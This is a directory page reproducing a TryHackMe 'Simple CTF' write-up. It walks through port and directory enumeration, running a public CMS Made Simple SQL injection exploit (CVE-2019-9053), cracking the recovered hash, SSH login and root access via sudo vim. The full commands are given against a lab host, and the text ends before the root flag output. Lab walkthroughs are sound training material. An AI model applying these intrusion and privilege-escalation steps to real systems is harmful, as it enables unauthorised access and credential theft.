Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Simple-CTF-Writeup — Professional TryHackMe Simple CTF walkthrough covering enumeration, CMS Made Simple SQL Injection (CVE-2019-9053), credential recovery, SSH access, privilege escalation via Vim, and root compromise. | Kitploit
Tools/GitHubGitHub/imperialx1104/simple-ctf-writeup
Password CrackingPrivilege EscalationReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

Professional TryHackMe Simple CTF walkthrough covering enumeration, CMS Made Simple SQL Injection (CVE-2019-9053), credential recovery, SSH access, privilege escalation via Vim, and root compromise.

View Repository
144 months agoNot yet reviewed

Simple-CTF-Writeup

Professional TryHackMe Simple CTF walkthrough covering enumeration, CMS Made Simple SQL Injection (CVE-2019-9053), credential recovery, SSH access, privilege escalation via Vim, and root compromise.

TryHackMe - Simple CTF Writeup

A complete walkthrough of the Simple CTF room on TryHackMe, covering reconnaissance, enumeration, exploitation, credential recovery, privilege escalation, and flag capture.


Room Information

FieldValue
PlatformTryHackMe
Room NameSimple CTF
DifficultyEasy
CategoryWeb Exploitation & Linux Privilege Escalation
AuthorSaahil Gupta (ImperialX1104)

Objective

The goal of this room is to:

  • Enumerate the target machine
  • Discover hidden services and applications
  • Exploit a vulnerable CMS
  • Recover credentials
  • Gain SSH access
  • Escalate privileges to root
  • Capture both flags

Attack Overview

Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

Reconnaissance

Host Discovery

The first step was verifying connectivity with the target machine.

Command

ping 10.49.175.174

Result

The host responded successfully, confirming that it was reachable.

Screenshot

Ping Scan


Port Enumeration

A comprehensive Nmap scan was performed to identify exposed services.

Command

nmap -A -v 10.49.175.174

Results

PortServiceVersion
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

Notable Findings

  • Anonymous FTP login enabled
  • Apache web server running
  • SSH exposed on port 2222
  • robots.txt file discovered

Screenshot

Nmap Enumeration


Web Enumeration

Navigating to the target web server displayed the default Apache landing page.

URL

http://10.49.175.174

Screenshot

Apache Default Page

At this stage no obvious attack surface was visible.


Directory Enumeration

To identify hidden resources, directory brute forcing was performed using FFUF.

Command

ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

Results

simple [Status: 301]

Screenshot

FFUF Enumeration

A directory named /simple was discovered.


CMS Discovery

Browsing to the discovered directory revealed a CMS installation.

URL

http://10.49.175.174/simple

Screenshot

CMS Made Simple

CMS Identified

CMS Made Simple 2.2.8

The version number would later prove critical.


Vulnerability Research

The CMS version was researched using SearchSploit.

Command

searchsploit "CMS Made Simple"

Result

CMS Made Simple < 2.2.10 - SQL Injection

Screenshot

SearchSploit Results

A known SQL Injection vulnerability was identified.


Exploit Acquisition

The exploit was copied locally for analysis and execution.

Command

searchsploit -m 46635

Output

CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

Screenshot

Exploit Download


Exploitation

The publicly available exploit was executed against the target CMS instance.

Command

python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

Credential Extraction

The exploit successfully extracted information from the backend database.

Output

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

Screenshot

Credential Extraction

Information Recovered

ItemValue
Usernamemitch
Email[email protected]
Salt1dac0d92e9fa6bb2

Password Cracking

The extracted hash was cracked using Hashcat.

Command

hashcat -m 20 hash.txt --show

Output

0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

Credentials Recovered

FieldValue
Usernamemitch
Passwordsecret

Screenshot

Hashcat Password Recovery


Initial Access

The recovered credentials were tested against the SSH service.

Command

ssh [email protected] -p 2222

Password

secret

Result

Welcome to Ubuntu 16.04.6 LTS

Screenshot

SSH Access

Successful authentication provided shell access as user mitch.


User Flag

After gaining access, the user flag was located in Mitch's home directory.

Commands

whoami
cd ~
cat user.txt

Output

G00d j0b, keep up!

Screenshot

User Flag


Privilege Escalation

Sudo Enumeration

Checking sudo permissions revealed an interesting configuration.

Command

sudo -l

Output

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Screenshot

sudo -l Output

This configuration allows the user to execute Vim with root privileges without supplying a password.


Root Access

Launching Vim as root:

sudo vim

Because Vim was running with elevated privileges, it could be used to access files owned by root.

Screenshot

Root Access via Vim


Root Flag

The root flag was located in the root user's directory.

Command

:! cat /root/root.txt

Output

Download Tool